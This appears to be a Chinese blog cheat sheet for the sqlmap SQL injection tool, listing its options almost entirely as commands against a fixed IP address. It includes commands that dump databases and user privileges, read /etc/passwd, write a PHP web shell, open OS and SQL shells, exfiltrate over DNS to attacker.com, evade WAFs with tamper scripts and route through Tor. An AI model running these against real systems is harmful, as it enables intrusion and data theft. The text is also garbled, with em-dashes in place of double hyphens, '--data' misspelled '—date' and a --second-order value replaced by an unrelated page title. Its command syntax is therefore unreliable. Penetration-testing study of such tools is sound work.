网络安全工具篇之Sqlmap(史上最全,收藏这篇就够了)
一、Sqlmap介绍
-
开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。
-
支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb
二、基本参数
1.—update: 更新
python sqlmap.py —update
python sqlmap.py -h
python sqlmap.py -h
python sqlmap.py —version
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -v 3
python sqlmap.py -d “mysql://root:root@192.168.126.128:3386/zkaq_databasename”
python sqlmap.py —wizard
三.确定目标
-
-u “URL” : 指定URL,get请求方式
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“
python sqlmap.py -m url.txt

-
-g :扫描,使用Google语法得到的url。
python sqlmap.py -g “inurl:\”.php?id=1\”
python sqlmap.py -r request.txt

-
-l log.txt —scope=”正则表达式” :Post提交方式,使用BurpSuit的log文件。(Options—>Misc—>Logging—>Proxy—>勾选Request ,scope的作用是 基于正则表达式去过滤日志内容,筛选需要扫描的对象。
python sqlmap.py -l log.txt —scope=”(www)?.target.(com|net|arg)”

-
-c sqlmap.conf :使用配置文件进行扫描 (sqlmap.conf与sqlmap.py 在同一目录)
python sqlmap.py -c sqlmap.conf
python sqlmap.py -u “http://target_url/param1/value1*/param2/value2“
四.配置目标参数
-
-p :指定要扫描的参数
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ -p “username,id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —skip “username,id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin&password=123”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin;password=123” —param-del=”;”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131 —-drop-set-cookie”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —user-agent=”aaaaaaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —random-agent
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —host=”aaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —referer=”aaaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —headers=”host:aaaa\nUser-Agent:bbbb”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —method=GET
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —auth-type Basic —auth-cred “user:pass”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“ —proxy-cred=”name:pass”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —ignore-proxy
五、配置目标行为
-
—force-ssl:使用HTTPS连接进行扫描
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —delay=”3”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —timeout=”10”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —retries=”1”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —randomize=”id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-url=”URL”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-freq
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —time-sec=”3”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-cols 6-9
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-char 123
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —technique US
六、优化探测过程
-
—level 2:检测cookie中是否含有注入、3:检测user-agent、referer是否含有注入、5:检测host是否含有注入
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —level 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —risk 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —predict-output
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —keep-alive
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —null-connection
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -o
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —threads=7
-
—string=”woaini” : 页面比较,用于基于布尔注入的检测,因为有时候页面随时间阈值变化,此时需要人为指定标识真假的字符串,除此之外,还有—not-string=”woaini”、—code=200、—titles=”Welcome”等等
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —string=”woaini”
七、特定目标环境
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —skip-urlencode
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —eval=”import hashlib;hash=hashlib.md5(id).hexdigest()”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1” —dbms=”Mysql”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os=”Windows”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —invalid-bignum
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —invalid-logical
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-cast
-
—no-escape:为了逃逸服务器端对sqlmap的检测,默认使用char()编码替换字符串。本参数将关闭此功能。比如 select ‘foo’ —> select cahr(102) + char(111) + char(111)
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-escape
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —prefix “‘)’”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —suffix “AND (‘abc’=’abc”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tamper=”tamper/between.py,tamper/randomcase.py”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dns-domain attacker.com
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —second-order “1.1.1.1 — The free app that makes your Internet faster.“
八、查看基本信息
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -f
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -b
九、查看数据信息
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —users
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dbs
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —schema
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -a
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -D database_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-user
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-db
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hostname
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —Privileges -U username
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —roles
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tables
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -T table_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —columns
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -C column_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —count
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —exclude-sysdbs
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dump
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —start 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —end 4
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-query “select * from users”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-columns
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-tables
十.其他参数
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —batch
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —charset=GBK
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —crawl=3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —csv-del=”;”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —flush-session
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —fresh-queries
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hex
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —parse-errors
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —answer=”extending=N”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —check-waf
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hpp
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —identify-waf
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —mobile
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —purge-output
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —smart
十一.高级注入参数
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-read=”/etc/passwd”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-write=”shell.php” —file-dest “/tmp/shell.php”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-shell
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os-shell
sqlmap.py -u http://navisec.it/123.asp?id=1 —tor -tor-type=SOCKS5 —tor-port=9050 —check-tor
更多推荐



所有评论(0)